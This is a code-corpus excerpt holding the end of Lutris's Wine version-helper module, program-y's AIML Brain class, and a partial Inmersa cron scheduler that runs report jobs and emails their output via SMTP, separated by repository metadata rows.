versions.append("PlayOnLinux %s-%s" % (version, arch))
return versions
@lru_cache(maxsize=8)
def get_wine_versions():
"""Return the list of Wine versions installed"""
versions = []
versions += get_system_wine_versions()
versions += get_lutris_wine_versions()
if os.environ.get("LUTRIS_ENABLE_PROTON"):
versions += get_proton_versions()
versions += get_pol_wine_versions()
return versions
def get_wine_version_exe(version):
if not version:
version = get_default_version()
if not version:
raise RuntimeError("Wine is not installed")
return os.path.join(WINE_DIR, "{}/bin/wine".format(version))
def is_version_installed(version):
return os.path.isfile(get_wine_version_exe(version))
def is_esync_limit_set():
"""Checks if the number of files open is acceptable for esync usage."""
if ESYNC_LIMIT_CHECK in ("0", "off"):
logger.info("fd limit check for esync was manually disabled")
return True
return linux.LINUX_SYSTEM.has_enough_file_descriptors()
def is_fsync_supported():
"""Checks if the running kernel has Valve's futex patch applied."""
if FSYNC_SUPPORT_CHECK in ("0", "off"):
logger.info("futex patch check for fsync was manually disabled")
return True
return fsync.is_fsync_supported()
def get_default_version():
"""Return the default version of wine. Prioritize 64bit builds"""
installed_versions = get_wine_versions()
wine64_versions = [version for version in installed_versions if "64" in version]
if wine64_versions:
return wine64_versions[0]
if installed_versions:
return installed_versions[0]
return
def get_wine_version(wine_path="wine"):
"""Return the version of Wine installed on the system."""
if wine_path != "wine" and not system.path_exists(wine_path):
return
if wine_path == "wine" and not system.find_executable("wine"):
return
if os.path.isabs(wine_path):
wine_stats = os.stat(wine_path)
if wine_stats.st_size < 2000:
# This version is a script, ignore it
return
version = system.read_process_output([wine_path, "--version"])
if not version:
logger.error("Error reading wine version for %s", wine_path)
return
if version.startswith("wine-"):
version = version[5:]
return version
def is_version_esync(path):
"""Determines if a Wine build is Esync capable
Params:
path: the path to the Wine version
Returns:
bool: True is the build is Esync capable
"""
try:
version = path.split("/")[-3].lower()
except IndexError:
logger.error("Invalid path '%s'", path)
return False
_version_number, version_prefix, version_suffix = parse_version(version)
esync_compatible_versions = ["esync", "lutris", "tkg", "ge", "proton", "staging"]
for esync_version in esync_compatible_versions:
if esync_version in version_prefix or esync_version in version_suffix:
return True
wine_version = get_wine_version(path).lower()
return "esync" in wine_version or "staging" in wine_version
def is_version_fsync(path):
"""Determines if a Wine build is Fsync capable
Params:
path: the path to the Wine version
Returns:
bool: True is the build is Fsync capable
"""
try:
version = path.split("/")[-3].lower()
except IndexError:
logger.error("Invalid path '%s'", path)
return False
_, version_prefix, version_suffix = parse_version(version)
fsync_compatible_versions = ["fsync", "lutris", "ge", "proton"]
for fsync_version in fsync_compatible_versions:
if fsync_version in version_prefix or fsync_version in version_suffix:
return True
return "fsync" in get_wine_version(path).lower()
def get_real_executable(windows_executable, working_dir=None):
"""Given a Windows executable, return the real program
capable of launching it along with necessary arguments."""
exec_name = windows_executable.lower()
if exec_name.endswith(".msi"):
return ("msiexec", ["/i", windows_executable], working_dir)
if exec_name.endswith(".bat"):
if not working_dir or os.path.dirname(windows_executable) == working_dir:
working_dir = os.path.dirname(windows_executable) or None
windows_executable = os.path.basename(windows_executable)
return ("cmd", ["/C", windows_executable], working_dir)
if exec_name.endswith(".lnk"):
return ("start", ["/unix", windows_executable], working_dir)
return (windows_executable, [], working_dir)
def display_vulkan_error(on_launch):
if on_launch:
checkbox_message = _("Launch anyway and do not show this message again.")
else:
checkbox_message = _("Enable anyway and do not show this message again.")
setting = "hide-no-vulkan-warning"
DontShowAgainDialog(
setting,
_("Vulkan is not installed or is not supported by your system"),
secondary_message=_(
"If you have compatible hardware, please follow "
"the installation procedures as described in\n"
"<a href='https://github.com/lutris/lutris/wiki/How-to:-DXVK'>"
"How-to:-DXVK (https://github.com/lutris/lutris/wiki/How-to:-DXVK)</a>"
),
checkbox_message=checkbox_message,
)
return settings.read_setting(setting) == "True"
def esync_display_limit_warning():
ErrorDialog(_(
"Your limits are not set correctly."
" Please increase them as described here:"
" <a href='https://github.com/lutris/lutris/wiki/How-to:-Esync'>"
"How-to:-Esync (https://github.com/lutris/lutris/wiki/How-to:-Esync)</a>"
))
def fsync_display_support_warning():
ErrorDialog(_(
"Your kernel is not patched for fsync."
" Please get a patched kernel to use fsync."
))
def esync_display_version_warning(on_launch=False):
setting = "hide-wine-non-esync-version-warning"
if on_launch:
checkbox_message = _("Launch anyway and do not show this message again.")
else:
checkbox_message = _("Enable anyway and do not show this message again.")
DontShowAgainDialog(
setting,
_("Incompatible Wine version detected"),
secondary_message=_(
"The Wine build you have selected "
"does not support Esync.\n"
"Please switch to an Esync-capable version."
),
checkbox_message=checkbox_message,
)
return settings.read_setting(setting) == "True"
def fsync_display_version_warning(on_launch=False):
setting = "hide-wine-non-fsync-version-warning"
if on_launch:
checkbox_message = _("Launch anyway and do not show this message again.")
else:
checkbox_message = _("Enable anyway and do not show this message again.")
DontShowAgainDialog(
setting,
_("Incompatible Wine version detected"),
secondary_message=_(
"The Wine build you have selected "
"does not support Fsync.\n"
"Please switch to an Fsync-capable version."
),
checkbox_message=checkbox_message,
)
return settings.read_setting(setting) == "True"
def get_overrides_env(overrides):
"""
Output a string of dll overrides usable with WINEDLLOVERRIDES
See: https://wiki.winehq.org/Wine_User%27s_Guide#WINEDLLOVERRIDES.3DDLL_Overrides
"""
if not overrides:
return ""
override_buckets = OrderedDict([("n,b", []), ("b,n", []), ("b", []), ("n", []), ("d", []), ("", [])])
for dll, value in overrides.items():
if not value:
value = ""
value = value.replace(" ", "")
value = value.replace("builtin", "b")
value = value.replace("native", "n")
value = value.replace("disabled", "")
try:
override_buckets[value].append(dll)
except KeyError:
logger.error("Invalid override value %s", value)
continue
override_strings = []
for value, dlls in override_buckets.items():
if not dlls:
continue
override_strings.append("{}={}".format(",".join(sorted(dlls)), value))
return ";".join(override_strings)
|
gpl-3.0
| 8,157,385,588,169,447,000 | 33.950339 | 105 | 0.639346 | false |
dkamotsky/program-y
|
src/programy/brain.py
|
1
|
12686
|
"""
Copyright (c) 2016 Keith Sterling
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import logging
import os.path
import xml.etree.ElementTree as ET
from programy.processors.processing import ProcessorLoader
from programy.config.brain import BrainConfiguration
from programy.mappings.denormal import DenormalCollection
from programy.mappings.gender import GenderCollection
from programy.mappings.maps import MapCollection
from programy.mappings.normal import NormalCollection
from programy.mappings.person import PersonCollection
from programy.mappings.predicates import PredicatesCollection
from programy.mappings.pronouns import PronounsCollection
from programy.mappings.properties import PropertiesCollection
from programy.mappings.sets import SetCollection
from programy.mappings.triples import TriplesCollection
from programy.parser.aiml_parser import AIMLParser
from programy.utils.services.service import ServiceFactory
from programy.utils.text.text import TextUtils
class Brain(object):
def __init__(self, configuration: BrainConfiguration):
self._configuration = configuration
self._aiml_parser = AIMLParser(stop_on_invalid=True)
self._denormal_collection = DenormalCollection()
self._normal_collection = NormalCollection()
self._gender_collection = GenderCollection()
self._person_collection = PersonCollection()
self._person2_collection = PersonCollection()
self._predicates_collection = PredicatesCollection()
self._pronouns_collection = PronounsCollection()
self._triples_collection = TriplesCollection()
self._sets_collection = SetCollection()
self._maps_collection = MapCollection()
self._properties_collection = PropertiesCollection()
self._preprocessors = ProcessorLoader()
self._postprocessors = ProcessorLoader()
self.load(self._configuration)
@property
def configuration(self):
return self._configuration
@property
def aiml_parser(self):
return self._aiml_parser
@property
def denormals(self):
return self._denormal_collection
@property
def normals(self):
return self._normal_collection
@property
def genders(self):
return self._gender_collection
@property
def persons(self):
return self._person_collection
@property
def person2s(self):
return self._person2_collection
@property
def predicates(self):
return self._predicates_collection
@property
def pronounds(self):
return self._pronouns_collection
@property
def triples(self):
return self._triples_collection
@property
def sets(self):
return self._sets_collection
@property
def maps(self):
return self._maps_collection
@property
def properties(self):
return self._properties_collection
@property
def preprocessors(self):
return self._preprocessors
@property
def postprocessors(self):
return self._postprocessors
def load(self, brain_configuration: BrainConfiguration):
self._aiml_parser.load_aiml(brain_configuration)
self.load_collections(brain_configuration)
self.load_services(brain_configuration)
def _load_denormals(self, brain_configuration):
if brain_configuration.denormal is not None:
total = self._denormal_collection.load_from_filename(brain_configuration.denormal)
logging.info("Loaded a total of %d denormalisations", total)
else:
logging.warning("No configuration setting for denormal")
def _load_normals(self, brain_configuration):
if brain_configuration.normal is not None:
total = self._normal_collection.load_from_filename(brain_configuration.normal)
logging.info("Loaded a total of %d normalisations", total)
else:
logging.warning("No configuration setting for normal")
def _load_genders(self, brain_configuration):
if brain_configuration.gender is not None:
total = self._gender_collection.load_from_filename(brain_configuration.gender)
logging.info("Loaded a total of %d genderisations", total)
else:
logging.warning("No configuration setting for gender")
def _load_persons(self, brain_configuration):
if brain_configuration.person is not None:
total = self._person_collection.load_from_filename(brain_configuration.person)
logging.info("Loaded a total of %d persons", total)
else:
logging.warning("No configuration setting for person")
def _load_person2s(self, brain_configuration):
if brain_configuration.person2 is not None:
total = self._person2_collection.load_from_filename(brain_configuration.person2)
logging.info("Loaded a total of %d person2s", total)
else:
logging.warning("No configuration setting for person2")
def _load_predicates(self, brain_configuration):
if brain_configuration.predicates is not None:
total = self._predicates_collection.load_from_filename(brain_configuration.predicates)
logging.info("Loaded a total of %d predicates", total)
else:
logging.warning("No configuration setting for predicates")
def _load_pronouns(self, brain_configuration):
if brain_configuration.pronouns is not None:
total = self._pronouns_collection.load_from_filename(brain_configuration.pronouns)
logging.info("Loaded a total of %d pronouns", total)
else:
logging.warning("No configuration setting for pronouns")
def _load_properties(self, brain_configuration):
if brain_configuration.properties is not None:
total = self._properties_collection.load_from_filename(brain_configuration.properties)
logging.info("Loaded a total of %d properties", total)
else:
logging.warning("No configuration setting for properties")
def _load_triples(self, brain_configuration):
if brain_configuration.triples is not None:
total = self._properties_collection.load_from_filename(brain_configuration.triples)
logging.info("Loaded a total of %d triples", total)
else:
logging.warning("No configuration setting for triples")
def _load_sets(self, brain_configuration):
if brain_configuration.set_files is not None:
total = self._sets_collection.load(brain_configuration.set_files)
logging.info("Loaded a total of %d sets files", total)
else:
logging.warning("No configuration setting for set files")
def _load_maps(self, brain_configuration):
if brain_configuration.map_files is not None:
total = self._maps_collection.load(brain_configuration.map_files)
logging.info("Loaded a total of %d maps files", total)
else:
logging.warning("No configuration setting for map files")
def _load_preprocessors(self, brain_configuration):
if brain_configuration.preprocessors is not None:
total = self._preprocessors.load(brain_configuration.preprocessors)
logging.info("Loaded a total of %d pre processors", total)
else:
logging.warning("No configuration setting for pre processors")
def _load_postprocessors(self, brain_configuration):
if brain_configuration.postprocessors is not None:
total = self._postprocessors.load(brain_configuration.postprocessors)
logging.info("Loaded a total of %d post processors", total)
else:
logging.warning("No configuration setting for post processors")
def load_collections(self, brain_configuration):
self._load_denormals(brain_configuration)
self._load_normals(brain_configuration)
self._load_genders(brain_configuration)
self._load_persons(brain_configuration)
self._load_person2s(brain_configuration)
self._load_predicates(brain_configuration)
self._load_pronouns(brain_configuration)
self._load_properties(brain_configuration)
self._load_triples(brain_configuration)
self._load_sets(brain_configuration)
self._load_maps(brain_configuration)
self._load_preprocessors(brain_configuration)
self._load_postprocessors(brain_configuration)
def load_services(self, brain_configuration):
ServiceFactory.preload_services(brain_configuration.services)
def pre_process_question(self, bot, clientid, question):
return self.preprocessors.process(bot, clientid, question)
def ask_question(self, bot, clientid, sentence) -> str:
conversation = bot.get_conversation(clientid)
topic_pattern = conversation.predicate("topic")
if topic_pattern is None:
logging.debug("No Topic pattern default to [*]")
topic_pattern = "*"
else:
logging.debug("Topic pattern = [%s]", topic_pattern)
try:
that_question = conversation.nth_question(2)
that_sentence = that_question.current_sentence()
# If the last response was valid, i.e not none and not empty string, then use
# that as the that_pattern, otherwise we default to '*' as pattern
if that_sentence.response is not None and that_sentence.response != '':
that_pattern = TextUtils.strip_all_punctuation(that_sentence.response)
logging.debug("That pattern = [%s]", that_pattern)
else:
logging.debug("That pattern, no response, default to [*]")
that_pattern = "*"
except Exception:
logging.debug("No That pattern default to [*]")
that_pattern = "*"
match_context = self._aiml_parser.match_sentence(bot, clientid,
sentence,
topic_pattern=topic_pattern,
that_pattern=that_pattern)
if match_context is not None:
template_node = match_context.template_node()
logging.debug("AIML Parser evaluating template [%s]", template_node.to_string())
#template_node.template.dump(tabs="", output_func=print)
response = template_node.template.resolve(bot, clientid)
return response
return None
def post_process_response(self, bot, clientid, response: str):
return self.postprocessors.process(bot, clientid, response)
def dump_tree(self):
self._aiml_parser.pattern_parser.root.dump(tabs="")
def write_learnf_to_file(self, bot, clientid, pattern, topic, that, template):
learnf_path = "%s/learnf%s" % (self._configuration.aiml_files.files, self._configuration.aiml_files.extension)
logging.debug("Writing learnf to %s", learnf_path)
if os.path.isfile(learnf_path) is False:
file = open(learnf_path, "w+")
file.write('<?xml version="1.0" encoding="UTF-8"?>\n')
file.write('<aiml>\n')
file.write('</aiml>\n')
file.close()
tree = ET.parse(learnf_path)
root = tree.getroot()
# Add our new element
child = ET.Element("category")
child.append(pattern)
child.append(topic)
child.append(that)
child.append(template.xml_tree(bot, clientid))
root.append(child)
tree.write(learnf_path, method="xml")
|
mit
| -2,240,654,620,025,691,600 | 40.188312 | 126 | 0.67271 | false |
Inmersa/Utilities
|
crontab/inmersa/scheduler/__init__.py
|
1
|
25463
|
__author__="tite"
__date__ ="$Jul 18, 2014 7:48:18 AM$"
import os
import sys
import string
import datetime
import traceback
from types import *
import ConfigParser
import smtplib
import logging
import logging.config
import extractors
import formatters
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEImage import MIMEImage
import email
class Schedule():
config = None
mainsection = 'General'
odate = datetime.datetime.today()
activeJobs = list()
logger = None
activeJob = None
def __init__(self,cfgfile):
# Constructor
docroot = '/root/crons'
self.config = ScheduleParams(self.mainsection)
if os.path.isfile(cfgfile):
self.config.read(cfgfile)
elif os.path.isfile(docroot + '/' + cfgfile):
self.config.read(docroot + '/' + cfgfile)
else:
raise Exception("No config file (",cfgfile,") found in "+docroot)
#sys.exit(0)
# Establecemos las variables por defecto
self.config.set('DEFAULT','fecha',str(self.odate.day)+'/'+str(self.odate.month)+'/'+str(self.odate.year))
self.config.set('DEFAULT','fechahora',str(self.odate.day)+'/'+str(self.odate.month)+'/'+str(self.odate.year)+' '+str(self.odate.hour)+':'+str(self.odate.minute))
#print "Buscando el condig: ",self.config.get(self.mainsection,'logging-config')
if not self.config.logger and self.config.get(self.mainsection,'logging-config'):
tmpfile = self.config.get(self.mainsection,'logging-config')
if not os.path.isfile(tmpfile): tmpfile = self.config.get(self.mainsection,'rootdir')+tmpfile
if os.path.isfile(tmpfile): logging.config.fileConfig(tmpfile)
else: print "ERROR: config log file not found"
self.logger = logging.getLogger(str(self.__class__))
else:
self.logger = logging.getLogger(str(self.__class__))
self.logger.debug("reaprovechando la definicion hecha del logger")
self.logger.debug("Scheduler constructor loaded. Using %(file)s for logging" % {'file':tmpfile} )
def _setupLog(self):
if not self.logger:
self.logger = logging.getLogger(str(self.__class__))
def load(self):
# Metodo Start??
aRawList = self.config.sections()
self.logger.debug("Checking on the following jobs: %s " % (aRawList))
for i in range(len(aRawList)):
if len(aRawList[i]):
if aRawList[i] == self.mainsection: continue;
seccion = aRawList[i]
# Los no activos, ni los miramos
if self.config.has_option(seccion,'activo'):
act = self.config.get(seccion,'activo')
if act in ('no','NO','nones','No','nO'): continue
self.logger.debug("%s : is active" % (seccion))
bHoraOK = False
if not self.config.has_option(seccion,'hora'): bHoraOK = True
else:
hora = self.config.get(seccion,'hora')
aTmp = hora.split(' ')
for h in aTmp:
if str(self.odate.hour) == h :
bHoraOK = True
break;
self.logger.debug("%s : hora?(%s)" % (seccion,bHoraOK))
if bHoraOK and self.config.has_option(seccion,'diasemana'):
bHoraOK = False
diahoy = self.odate.weekday()+1
tmpstr = self.config.get(seccion,'diasemana')
aTmp = tmpstr.split(' ')
if len(aTmp):
for d in aTmp:
if str(diahoy) == d:
bHoraOK = True
break;
self.logger.debug("%s check diasemana: sigue activo ?(%s)" % (seccion,bHoraOK))
if bHoraOK and self.config.has_option(seccion,'dia'):
bHoraOK = False
diahoy = self.odate.day
tmpstr = self.config.get(seccion,'dia')
aTmp = tmpstr.split(' ')
if len(aTmp):
for d in aTmp:
if str(diahoy) == d:
bHoraOK = True
break;
self.logger.debug("%s check dia: sigue activo ?(%s)" % (seccion,bHoraOK))
if bHoraOK and self.config.has_option(seccion,'mes'):
bHoraOK = False
diahoy = self.odate.month
tmpstr = self.config.get(seccion,'mes')
aTmp = tmpstr.split(' ')
if len(aTmp):
for d in aTmp:
if str(diahoy) == d:
bHoraOK = True
break;
self.logger.debug("%s check mes: sigue activo ?(%s)" % (seccion,bHoraOK))
if bHoraOK:
if self.config.has_option(seccion,'extractor'): self.activeJobs.append(seccion)
self.logger.debug("Loaded the following jobs: %s " % (self.activeJobs))
def loadJob(self,seccion):
self._setupLog()
self.logger.debug("%s: startup with dCfg %s " % (seccion,self.config.dCfg))
if not self.activeJob: self.config._loadMain()
self.logger.debug("%s: after loadMain with dCfg %s " % (seccion,self.config.dCfg))
self.config.initialize(seccion)
self.logger.debug("%s: after initialize with dCfg %s " % (seccion,self.config.dCfg))
self.activeJob = Job(self.config)
self.logger.debug("method end - seccion(%(sec)s) with this config: %(dic)s " % {'sec':seccion, 'dic':self.config.dCfg} )
def run(self):
# Validacion para un metodo de test
#ruben
if not len(self.activeJobs):
#print "Nothing to do at ",self.odate.hour
self.logger.info("Nothing to do. No active jobs for this execution")
return
# Mandando el correo
# Metodo run, para hacer los temas
### TODO: With all these validations, raise errors, instead of assigning default values
if self.config.has_option('General','remite'):
varfrom = self.config.get('General','remite')
else: varfrom = 'IEmpresa-biomundo@biomundo'
if self.config.has_option('General','tema'):
subject = self.config.get('General','tema')
else: subject = 'Informe de las '+str(self.odate.hour)
if self.config.has_option('General','smtp-server'):
servidor_correo = self.config.get('General','smtp-server')
else: servidor_correo = 'mail.wol'
aEmailDef = list()
if self.config.has_option('General','email'):
tmp = self.config.get('General','email')
aTmp = tmp.split(' ')
for e in aTmp: aEmailDef.append(e)
dEmailList = {}
for i in range(len(self.activeJobs)):
seccion = self.activeJobs[i]
try:
self.loadJob(seccion)
oI = self.activeJob
self.logger.debug("retrieved job %s " % oI)
if not oI: continue
oI.run()
oTmpMsg = oI.getMimeResult()
# if not isinstance(oTmpMsg,(list)): self.logger.debug("%s: Before closing .. Here is our message!\n%s"%(self.config.seccion(),oTmpMsg.as_string()))
oI.close()
#TODO: Here, issue and log an error before continuing
if not oTmpMsg or (type(oTmpMsg) is not DictType and type(oTmpMsg) is not InstanceType) :
self.logger.debug("No message! ")
continue
# if not isinstance(oTmpMsg,(list)): self.logger.debug("%s: Here is our message!\n%s"%(self.config.seccion(),oTmpMsg.as_string()))
aEmails = list()
if self.config.has_option(seccion,'email'):
tmp = self.config.get(seccion,'email')
aTmp = tmp.split(' ')
for e in aTmp: aEmails.append(e)
else: aEmails = aEmailDef
self.logger.debug("%s: Standard recipients on this section: %s " % (self.config.seccion(),aEmails))
if type(oTmpMsg) is InstanceType:
if aEmails and len(aEmails):
for e in aEmails:
bAttach = True
if not dEmailList.has_key(e):
if False and isinstance(oTmpMsg,(MIMEMultipart)):
self.logger.debug("%s: turns out we already have a multipart"%(self.config.seccion()))
dEmailList[e] = oTmpMsg
bAttach = False
else:
self.logger.debug("%s: building a new Multipart for %s " % (self.config.seccion(),e))
dEmailList[e] = MIMEMultipart('mixed')
dEmailList[e].add_header('Subject',subject)
dEmailList[e].add_header('To',e)
# self.logger.debug("%s: Adding %s to destination %s . now having:\n%s" % (self.config.seccion(),oTmpMsg.__class__,e,dEmailList[e].as_string()))
if bAttach: dEmailList[e].attach( oTmpMsg )
else:
"""
Si existe la opcion email en la seccion, ademas de a los indicados por la SQL (si hay) se manda
email a estos.
"""
self.logger.debug("%s: the sepecific job is a multi-destination " % (self.config.seccion()))
for (e,oMsg) in oTmpMsg.items():
#self.logger.debug("List of parts ? To: %s " % (e))
self.logger.debug("%s: job destination %s over class %s " % (self.config.seccion(),e,oMsg.__class__))
if not dEmailList.has_key(e):
self.logger.debug("%s: building a new Multipart for %s " % (self.config.seccion(),e))
dEmailList[e] = MIMEMultipart()
dEmailList[e].add_header('Subject',subject)
dEmailList[e].add_header('To',e)
dEmailList[e].attach( oMsg )
# if self.config.has_option(seccion,'email'):
if aEmails and len(aEmails):
for ee in aEmails:
if ee == e: continue;
self.logger.debug("%s: Topping with additional destination %s " % (self.config.seccion(),ee))
if not dEmailList.has_key(ee):
self.logger.debug("%s: building a new Multipart for %s " % (self.config.seccion(),ee))
dEmailList[ee] = MIMEMultipart()
dEmailList[ee].add_header('Subject',subject)
dEmailList[ee].add_header('To',ee)
dEmailList[ee].attach( oMsg )
except Exception as err:
self.logger.exception("When loading job %s " % (seccion))
continue
self.logger.info("ALL Jobs ran. ready to transport the output")
#FIXME: Credentials to authenticate on the SMTP Server need to be on config file!
if self.config.has_option('General','smtp-user'):
user = self.config.get('General','smtp-user')
else: user = None
if self.config.has_option('General','smtp-password'):
pwd = self.config.get('General','smtp-password')
else: pwd = None
if self.config.has_option('General','smtp-port'):
port = self.config.get('General','smtp-port')
else: port = 587
if True:
for (e,oBody) in dEmailList.items():
try:
#print e, oBody
self.logger.debug("Preparing email for %s" % (e))
for part in oBody.walk():
try:
self.logger.debug("\t%s / %s boundary %s " % (part.get_content_maintype(),part.get_content_subtype(),part.get_boundary()))
self.logger.debug("\tContent Disposition : %s - Content ID: %s " % (part.get_all('Content-disposition'),part.get_all('Content-ID')))
self.logger.debug("\tsample: %s\n----- next -----" % (part.get_payload(decode=False)[:75]))
except:
self.logger.debug("----- next -----")
smtpserver = smtplib.SMTP(servidor_correo,port)
#smtpserver = smtplib.SMTP("mail.biomundo.eu",587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo
if user: smtpserver.login(user, pwd)
self.logger.debug("transfering data for %s" % (e))
smtpserver.sendmail(varfrom,e,oBody.as_string())
#smtp.sendmail(varfrom,e,oBody.as_string())
self.logger.debug('done!')
smtpserver.close()
except Exception,e:
self.logger.exception("Error sending email")
continue
else:
for (e,oBody) in dEmailList.items():
self.logger.debug("this is a dry run email to %s with content:\n%s" % (e,oBody))
self.logger.debug("End of Schedule run")
class ScheduleParams(ConfigParser.ConfigParser):
mainsection = 'General'
__dCfgGroups = {}
__dCfgVars = {}
aRequiredFields = None
aRequiredPaths = None
dCfg = {}
aLocalGroups = None
bStatusOK = True
mainConfigOptions = None
logger = None
_aliases = { 'disposition': ['disposicion'] }
"""
def __init__ (self,oCfg,seccion) :
"""
def __init__(self,general=None):
" quizas forzar el nombre de file "
if general: self.mainsection = general
ConfigParser.ConfigParser.__init__(self)
#super(ScheduleParams, self).__init__()
try:
#print "Buscando el condig: ",self.config.get(self.mainsection,'logging-config')
if self.get(self.mainsection,'logging-config'):
tmpfile = self.get(self.mainsection,'logging-config')
if not os.path.isfile(tmpfile):
tmpfile = self.get(self.mainsection,'rootdir')+tmpfile
if os.path.isfile(tmpfile):
logging.config.fileConfig(tmpfile)
else:
print "ERROR: config log file not found"
self.logger = logging.getLogger(str(self.__class__))
self.logger.debug("Constructor loaded. Using %(file)s for logging" % {'file':tmpfile} )
except ConfigParser.NoSectionError,e:
# ok
print "ScheduleParams::__init__() - with no config to get a logger"
def _setupLog(self):
if not self.logger:
self.logger = logging.getLogger(str(self.__class__))
def _loadMain(self):
self._setupLog()
if not self.mainConfigOptions:
self.logger.debug("mainConfigOptions empty. Loading them")
self.mainConfigOptions = self.options(self.mainsection)
if not len(self.mainConfigOptions):
self.bStatusOK = False
return None
self.__dCfgGroups = {}
self.__dCfgVars = {}
self.logger.debug("we should not be entering here more than once per execution .... ")
for i in range(len(self.mainConfigOptions)):
self.logger.debug("Iterator4mainConfigOptions %s - %s"%(i,self.mainConfigOptions[i]))
if self.mainConfigOptions[i].find('_') != -1:
aTmp = self.mainConfigOptions[i].split('_')
if len(aTmp) > 1:
if not self.__dCfgGroups.has_key(aTmp[0]): self.__dCfgGroups[aTmp[0]] = {}
if self.has_option(self.seccion(),self.mainConfigOptions[i]):
self.__dCfgGroups[aTmp[0]][aTmp[1]] = self.get(seccion,self.mainConfigOptions[i])
else:
self.__dCfgGroups[aTmp[0]][aTmp[1]] = self.get(self.mainsection,self.mainConfigOptions[i])
else:
# maybe this is the only part that should be executed over and over ??
if self.seccion() and self.has_option(self.seccion(),self.mainConfigOptions[i]):
self.__dCfgVars[self.mainConfigOptions[i]] = self.get(self.seccion(),self.mainConfigOptions[i])
else:
self.__dCfgVars[self.mainConfigOptions[i]] = self.get(self.mainsection,self.mainConfigOptions[i])
self.logger.debug("dCfgGroups is %s \ndCfgVars is %s"%(self.__dCfgGroups,self.__dCfgVars))
def initialize(self,seccion):
self._setupLog()
self.logger.debug("%s Initializing with dCfg %s " % (seccion,self.dCfg))
self.dCfg = {}
# self.__dCfgVars = {}
self.dCfg['__seccion__'] = seccion
self.logger.debug("seccion(%(sec)s)" % {'sec':seccion} )
def seccion(self):
self._setupLog()
if not self.dCfg or not self.dCfg.has_key('__seccion__'): return None
return self.dCfg['__seccion__']
def getCfgGroup (self,gname):
self._setupLog()
if not gname: return None
if not self.__dCfgGroups.has_key(gname): return None
return self.__dCfgGroups[gname]
def getCfgVar (self,vname):
self._setupLog()
if not vname: return None
if not self.__dCfgVars.has_key(vname): return None
return self.__dCfgVars[vname]
def setCfgVar (self,vname,val):
self._setupLog()
if not vname or not val: return False
self.__dCfgVars[vname] = val
return True
def getCfgVarFromGroup (self,gname,vname):
self._setupLog()
self.logger.debug("%s gname(%s) vname(%s) sobre __dCfgGroup(%s)"%(self.seccion(),gname,vname,self.__dCfgGroups))
if not gname: return None
if not self.__dCfgGroups.has_key(gname): return None
if type(self.__dCfgGroups[gname]) is not DictType: return None
if not self.__dCfgGroups[gname].has_key(vname): return None
return self.__dCfgGroups[gname][vname]
def setCfgVarFromGroup (self,gname,vname,val):
self._setupLog()
self.logger.debug("%s gname(%s) vname(%s) sobre dCfg(%s)"%(self.seccion(),gname,vname,self.dCfg))
if not gname or not vname or not self.__dCfgGroups.has_key(gname) or \
type(self.__dCfgGroups[gname]) is not DictType : return False
self.__dCfgGroups[gname][vname] = val
return True
def getVar(self,gname,vname = None):
self._setupLog()
if not vname and gname:
vname = gname
gname = None
if not vname: return None
self.logger.debug("%s vname(%s) gname(%s) sobre dCfg(%s)"%(self.seccion(),vname,gname,self.dCfg))
if gname and vname :
if not self.dCfg.has_key(gname) or \
type(self.dCfg[gname]) is not DictType or \
not self.dCfg[gname].has_key(vname): return None
return self.dCfg[gname][vname]
else:
if not self.dCfg.has_key(vname): return None
return self.dCfg[vname]
def param(self,param):
#First we normalize the parameter.
#self.logger.debug("%s con aliases tot %s " % (param,self._aliases))
if param in self._aliases.keys(): vars = self._aliases[param] + [param]
else: vars = [param]
aTmp = []
for v in vars:
rval = self.getVar(v)
self.logger.debug("buscando %s nos da %s " % (v,rval))
if not rval and v == vars[-1]:
rval = self.getCfgVar(v)
self.logger.debug("Ahora si que lo buscamos en el general %s nos da %s " % (v,rval))
if not rval and len(aTmp):
self.logger.debug("Buscando los resstos: %s " % (aTmp))
for ts in aTmp:
self.logger.debug("we are going to use ... %s " % (ts))
rval = ts
break
else:
tmpstr = self.getCfgVar(v)
if tmpstr: aTmp.append(tmpstr)
tmpstr = self.getCfgVar(v)
if tmpstr: aTmp.append(tmpstr)
if rval: break
if not rval: return rval
if param in ('disposition'):
if rval in ('adjunto'): rval = 'attachment'
elif rval in ('interno','in','dentro'): rval = 'inline'
else: rval = 'attachment'
return rval
class Job:
dTipos = None
params = None
logger = None
#TODO: this list needs to change from static to a dynamic list. That is,
# there needs to be a way of registering entries/classes as a module is
# imported. So there would be a config path on which module paths to load
# and when loading them, they would add whatever classes to a tuple
extractores = {
'sql':extractors.SQLFileQuery,
'html':extractors.HTMLFetch,
'web':extractors.HTMLFetch,
'sqltoweb':extractors.SQLValuesToWebFetch,
'system':extractors.SysExec
}
formateadores = {
'csv':formatters.CSVFormat,
'text':formatters.TextFormat,
'txt':formatters.TextFormat,
'html':formatters.HTMLFormat,
'xls':formatters.ExcelFormat
}
Extractor = None
Formatter = None
def __init__(self,config):
self.logger = logging.getLogger(str(self.__class__))
if config:
self.logger.debug("Asignando el atributo params ..")
self.params = config
#self.logger.debug("hecho. ahora vamos a cargar los parametros ")
#self._load()
tipo = self.params.get(self.params.seccion(),'extractor')
logger = logging.getLogger(str(self.__class__))
if not tipo:
raise Exception(str(cls)+"::factory wrong argument tipo :"+str(tipo))
if tipo not in self.extractores.keys():
raise Exception("Tipo "+str(tipo)+" desconocido ")
try:
## El job deberia recibir en realidad 3 parametros de tipo: 1) extractor a usar 2) formateador a usar 3) transporte a usar (y correrlo)
## quizas esta clase deberia ser un Wrapper, que luego llame al resto.
